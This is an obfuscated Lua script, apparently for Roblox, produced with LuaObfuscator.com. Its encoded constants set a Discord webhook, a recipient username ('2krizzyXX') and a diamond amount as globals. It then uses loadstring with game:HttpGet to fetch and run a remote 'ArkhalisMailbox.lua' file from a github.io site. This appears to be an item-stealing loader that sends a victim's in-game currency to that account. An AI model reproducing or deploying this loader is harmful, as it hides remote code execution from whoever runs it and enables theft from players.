--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0 -0 ;local v32;while true do if (v31==(2 -1)) then return v32;end if (v31==(0 -0)) then v32=v1(v16,v19,v19);v19=v19 + (2 -1) ;v31=620 -(555 + 64) ;end end end v23=nil;function v23()local v33=931 -(857 + 74) ;local v34;local v35;while true do if (v33==0) then v34,v35=v1(v16,v19,v19 + (570 -(367 + 201)) );v19=v19 + (929 -(214 + 713)) ;v33=1 + 0 ;end if (v33==(1 + 0)) then return (v35 * ((2770 -(1523 + 114)) -(282 + 595))) + v34 ;end end end v18=3;end if (v18==4) then function v25()local v36=v24();local v37=v24();local v38=1 + 0 ;local v39=(v21(v37,1 -(0 -0) ,20) * ((1067 -(68 + 997))^((2361 -1059) -(226 + 760 + 284)))) + v36 ;local v40=v21(v37,91 -(1067 -(915 + 82)) ,148 -(32 + 85) );local v41=((v21(v37,32 + 0 )==(1 + 0)) and  -((2712 -1754) -(892 + 65))) or 1 ;if (v40==(0 -0)) then if (v39==(0 -0)) then return v41 * (0 -0) ;else v40=1;v38=350 -(87 + 263) ;end elseif (v40==(2227 -(67 + 113))) then return ((v39==(0 + 0)) and (v41 * (1/(0 -0)))) or (v41 * NaN) ;end return v8(v41,v40-(753 + 270) ) * (v38 + (v39/((7 -5)^(1004 -(802 + 150))))) ;end v26=nil;function v26(v42)local v43;if  not v42 then local v85=0 + 0 ;while true do if (((0 -0) -0)==v85) then v42=v24();if (v42==((207 + 980) -(1069 + 118))) then return "";end break;end end end v43=v3(v16,v19,(v19 + v42) -(2 -1) );v19=v19 + v42 ;local v44={};for v69=1, #v43 do v44[v69]=v2(v1(v3(v43,v69,v69)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v45==1) then v48=nil;v49=nil;v45=531 -(406 + 123) ;end if (v45~=2) then else v50=nil;v51=nil;v45=1772 -(1749 + 20) ;end if (v45==0) then v46=0;v47=nil;v45=1;end if (v45==(1 + 3)) then v54=nil;while true do if (v46==(1326 -(1249 + 73))) then while true do if (v47~=2) then else local v110=0 + 0 ;local v111;while true do if (v110==0) then v111=1145 -(466 + 679) ;while true do if (v111==(2 -1)) then v47=8 -5 ;break;end if (v111~=(1900 -(106 + 1794))) then else local v156=0;while true do if ((1 + 0)~=v156) then else v111=1;break;end if (v156==0) then v52=nil;v53=nil;v156=1 + 0 ;end end end end break;end end end if (v47~=0) then else local v112=0;while true do if (0~=v112) then else local v153=0 -0 ;while true do if (0==v153) then v48=0;v49=nil;v153=2 -1 ;end if (1~=v153) then else v112=1;break;end end end if (v112~=(115 -(4 + 110))) then else v47=585 -(57 + 527) ;break;end end end if (v47~=(1428 -(41 + 1386))) then else local v113=0;while true do if (0~=v113) then else v50=nil;v51=nil;v113=104 -(17 + 86) ;end if (v113==(1 + 0)) then v47=3 -1 ;break;end end end if (v47~=3) then else v54=nil;while true do local v114=0;while true do if (v114~=0) then else if (v48~=2) then else local v157=0;local v158;local v159;while true do if (v157==(2 -1)) then while true do if (v158~=(166 -(122 + 44))) then else v159=0;while true do if (v159==1) then for v173=1,v24() do local v174=0;local v175;local v176;while true do if ((1 -0)==v174) then while true do if (v175~=0) then else v176=v22();if (v21(v176,1,3 -2 )~=(0 + 0)) then else local v188=0 + 0 ;local v189;local v190;local v191;local v192;local v193;local v194;while true do if (0==v188) then v189=0 -0 ;v190=nil;v188=66 -(30 + 35) ;end if (1~=v188) then else v191=nil;v192=nil;v188=2 + 0 ;end if (v188~=2) then else v193=nil;v194=nil;v188=3;end if (v188~=(1260 -(1043 + 214))) then else while true do if ((0 -0)==v189) then local v198=0;while true do if (v198==(1213 -(323 + 889))) then v189=1;break;end if (v198~=(0 -0)) then else v190=580 -(361 + 219) ;v191=nil;v198=1;end end end if (v189==1) then local v199=0;while true do if (v199==(321 -(53 + 267))) then v189=1 + 1 ;break;end if (v199==(413 -(15 + 398))) then v192=nil;v193=nil;v199=983 -(18 + 964) ;end end end if (v189~=(7 -5)) then else v194=nil;while true do if (v190~=(0 + 0)) then else local v201=0 + 0 ;while true do if (v201~=0) then else v191=0;v192=nil;v201=1;end if (v201~=(851 -(20 + 830))) then else v190=1 + 0 ;break;end end end if ((128 -(116 + 10))~=v190) then else while true do if (v191==2) then local v203=0;local v204;while true do if ((0 + 0)==v203) then v204=0;while true do if (v204==0) then local v214=738 -(542 + 196) ;while true do if (v214==0) then if (v21(v193,1 -0 ,1)~=1) then else v194[1 + 1 ]=v54[v194[2]];end if (v21(v193,2 + 0 ,1 + 1 )~=(2 -1)) then else v194[3]=v54[v194[3]];end v214=2 -1 ;end if (v214~=1) then else v204=1552 -(1126 + 425) ;break;end end end if (v204==1) then v191=408 -(118 + 287) ;break;end end break;end end end if (v191==(0 -0)) then local v205=0;local v206;while true do if (v205~=(1121 -(118 + 1003))) then else v206=0 -0 ;while true do if (v206~=1) then else v191=378 -(142 + 235) ;break;end if (v206==0) then local v215=0 -0 ;while true do if (1~=v215) then else v206=1 + 0 ;break;end if (v215==(977 -(553 + 424))) then v192=v21(v176,2,5 -2 );v193=v21(v176,4 + 0 ,6 + 0 );v215=1;end end end end break;end end end if (v191==(1 + 0)) then local v207=0 + 0 ;while true do if (v207==(1 + 0)) then v191=2;break;end if (v207~=0) then else v194={v23(),v23(),nil,nil};if (v192==0) then local v211=0;local v212;local v213;while true do if (v211==1) then while true do if (v212~=0) then else v213=0;while true do if (0==v213) then v194[3]=v23();v194[4]=v23();break;end end break;end end break;end if (v211==0) then v212=0 -0 ;v213=nil;v211=1;end end elseif (v192==1) then v194[3]=v24();elseif (v192==2) then v194[3]=v24() -((4 -2)^(5 + 11)) ;elseif (v192==3) then local v222=0 -0 ;local v223;while true do if (v222==0) then v223=753 -(239 + 514) ;while true do if (v223==0) then v194[3]=v24() -(2^16) ;v194[4]=v23();break;end end break;end end end v207=1;end end end if (v191==3) then if (v21(v193,3,2 + 1 )~=1) then else v194[1333 -(797 + 532) ]=v54[v194[4]];end v49[v173]=v194;break;end end break;end if (v190~=1) then else local v202=0;while true do if (v202~=(0 + 0)) then else v193=nil;v194=nil;v202=1;end if (v202~=1) then else v190=2;break;end end end end break;end end break;end end end break;end end break;end if (v174~=0) then else v175=0 + 0 ;v176=nil;v174=2 -1 ;end end end v48=3;break;end if (v159~=(1202 -(373 + 829))) then else local v169=0;while true do if (0~=v169) then else for v180=1,v53 do local v181=0;local v182;local v183;local v184;while true do if (v181~=(732 -(476 + 255))) then else v184=nil;while true do if (v182==1) then if (v183==(1131 -(369 + 761))) then v184=v22()~=(0 + 0) ;elseif (v183==2) then v184=v25();elseif (v183==3) then v184=v26();end v54[v180]=v184;break;end if (v182~=0) then else local v196=0 -0 ;local v197;while true do if ((0 -0)~=v196) then else v197=0;while true do if (v197~=(238 -(64 + 174))) then else local v200=0;while true do if (v200==1) then v197=1 + 0 ;break;end if (v200~=(0 -0)) then else v183=v22();v184=nil;v200=337 -(144 + 192) ;end end end if (v197==(217 -(42 + 174))) then v182=1;break;end end break;end end end end break;end if (v181==(0 + 0)) then local v186=0 + 0 ;local v187;while true do if (v186==(0 + 0)) then v187=1504 -(363 + 1141) ;while true do if (v187==(1580 -(1183 + 397))) then v182=0;v183=nil;v187=2 -1 ;end if (v187~=(1 + 0)) then else v181=1 + 0 ;break;end end break;end end end end end v52[3]=v22();v169=1976 -(1913 + 62) ;end if (v169==1) then v159=1;break;end end end end break;end end break;end if (v157~=(0 + 0)) then else v158=0;v159=nil;v157=2 -1 ;end end end if (v48~=1) then else local v160=1933 -(565 + 1368) ;local v161;local v162;while true do if (v160~=(0 -0)) then else v161=1661 -(1477 + 184) ;v162=nil;v160=1 -0 ;end if (v160==(1 + 0)) then while true do if (v161==(856 -(564 + 292))) then v162=0 -0 ;while true do if (v162==(0 -0)) then local v170=304 -(244 + 60) ;while true do if (v170~=(1 + 0)) then else v162=1;break;end if (v170==(476 -(41 + 435))) then v52={v49,v50,nil,v51};v53=v24();v170=1126 -(936 + 189) ;end end end if (v162~=(1 + 0)) then else v54={};v48=1615 -(1565 + 48) ;break;end end break;end end break;end end end v114=1 + 0 ;end if (v114~=(1139 -(782 + 356))) then else if (v48==0) then local v163=267 -(176 + 91) ;local v164;local v165;while true do if (v163==(2 -1)) then while true do if (v164==(0 -0)) then v165=0;while true do if (v165~=0) then else local v171=0;local v172;while true do if ((1092 -(975 + 117))==v171) then v172=0;while true do if (v172==(1875 -(157 + 1718))) then local v185=0;while true do if ((0 + 0)~=v185) then else v49={};v50={};v185=1;end if (v185~=(3 -2)) then else v172=1;break;end end end if (v172~=(3 -2)) then else v165=1019 -(697 + 321) ;break;end end break;end end end if ((2 -1)==v165) then v51={};v48=1 -0 ;break;end end break;end end break;end if (v163==(0 -0)) then v164=0;v165=nil;v163=1;end end end if (v48==3) then local v166=0 + 0 ;while true do if (0==v166) then local v167=0 -0 ;while true do if ((0 -0)==v167) then local v168=1227 -(322 + 905) ;while true do if (v168~=(611 -(602 + 9))) then else for v177=1,v24() do v50[v177-1 ]=v29();end return v52;end end end end end end end break;end end end break;end end break;end if (v46~=(1189 -(449 + 740))) then else local v99=0;while true do if (v99==(873 -(826 + 46))) then v46=948 -(245 + 702) ;break;end if (v99==(0 -0)) then v47=0;v48=nil;v99=1 + 0 ;end end end if (v46==(1901 -(260 + 1638))) then local v100=0;while true do if (v100==1) then v46=4;break;end if (v100~=(440 -(382 + 58))) then else v53=nil;v54=nil;v100=1;end end end if (v46==2) then local v101=0;while true do if (v101~=1) then else v46=3;break;end if (0==v101) then v51=nil;v52=nil;v101=1;end end end if (v46==(3 -2)) then v49=nil;v50=nil;v46=2;end end break;end if (v45~=3) then else v52=nil;v53=nil;v45=4;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v55)if (v1(v55,2)==79) then local v86=0;while true do if (v86==0) then v20=v0(v3(v55,1,1));return "";end end else local v87=v2(v0(v55,16));if v20 then local v94=v5(v87,v20);v20=nil;return v94;else return v87;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v56,v57,v58,v59=v1(v16,v19,v19 + 3 );v19=v19 + 4 + 0 ;return (v59 * (34673478 -(39293771 -21397509))) + (v58 * (194812 -129276)) + (v57 * (1461 -(902 + 303))) + v56 ;end v25=nil;v18=4;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v71=v63;local v72=v64;local v73=v65;local v74=v28;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v88=0,v79 do if (v88>=v73) then v77[v88-v73 ]=v78[v88 + 1 ];else v81[v88]=v78[v88 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=5) then if (v84<=2) then if (v84<=0) then v81[v83[2]]();elseif (v84>1) then local v115=v83[2];v81[v115]=v81[v115](v13(v81,v115 + 1 ,v76));else do return;end end elseif (v84<=3) then if (v81[v83[2]]==v83[4]) then v75=v75 + 1 ;else v75=v83[3];end elseif (v84==4) then v81[v83[2]]=v62[v83[3]];else local v120=v83[2];local v121,v122=v74(v81[v120](v13(v81,v120 + 1 ,v83[3])));v76=(v122 + v120) -1 ;local v123=0;for v148=v120,v76 do local v149=0;while true do if (v149==0) then v123=v123 + 1 ;v81[v148]=v121[v123];break;end end end end elseif (v84<=8) then if (v84<=6) then v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v62[v83[3]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v75=v83[3];elseif (v84==7) then v75=v83[3];else v81[v83[2]][v83[3]]=v83[4];end elseif (v84<=9) then v81[v83[2]]=v83[3];elseif (v84==10) then local v127=v83[2];local v128=v81[v83[3]];v81[v127 + 1 ]=v128;v81[v127]=v128[v83[4]];else local v132;local v133,v134;local v135;local v136;v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v62[v83[3]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v62[v83[3]];v75=v75 + 1 ;v83=v71[v75];v136=v83[2];v135=v81[v83[3]];v81[v136 + 1 ]=v135;v81[v136]=v135[v83[4]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v136=v83[2];v133,v134=v74(v81[v136](v13(v81,v136 + 1 ,v83[3])));v76=(v134 + v136) -1 ;v132=0;for v150=v136,v76 do v132=v132 + 1 ;v81[v150]=v133[v132];end v75=v75 + 1 ;v83=v71[v75];v136=v83[2];v81[v136]=v81[v136](v13(v81,v136 + 1 ,v76));v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]();v75=v75 + 1 ;v83=v71[v75];v75=v83[3];end v75=v75 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v91=(v66/((4 -(5 -3))^(v67-(1 + 0))))%((1 + 0 + 1)^(((v68-(3 -2)) -(v67-(1691 -(1121 + 569)))) + (215 -(22 + 192)))) ;return v91-(v91%(1 -0)) ;else local v92=683 -(483 + 105 + 95) ;local v93;while true do if (v92==(1463 -(1404 + 59))) then v93=(2 + (0 -0))^(v67-(2 -1)) ;return (((v66%(v93 + v93))>=v93) and (1 -0)) or 0 ;end end end end v22=nil;v18=2;end end end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O312O3033373836303236333933313936352F30354F6A4E436B622O414A5F574B6E61776E36373544452D717A30485F4278797A504C744D2D52454C5439695F33306C424D4E7A7459793845527A4F4C7A5F793237426B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756103083O00557365726E616D6503093O00326B72692O7A792O5803083O004469616D6F6E6473024O0080841E4100163O0012093O00013O0026033O000D000100020004073O000D0001001204000100033O00300B00010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026033O0001000100010004073O00010001001204000100033O0030060001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00013O00017O00",v9(),...);end
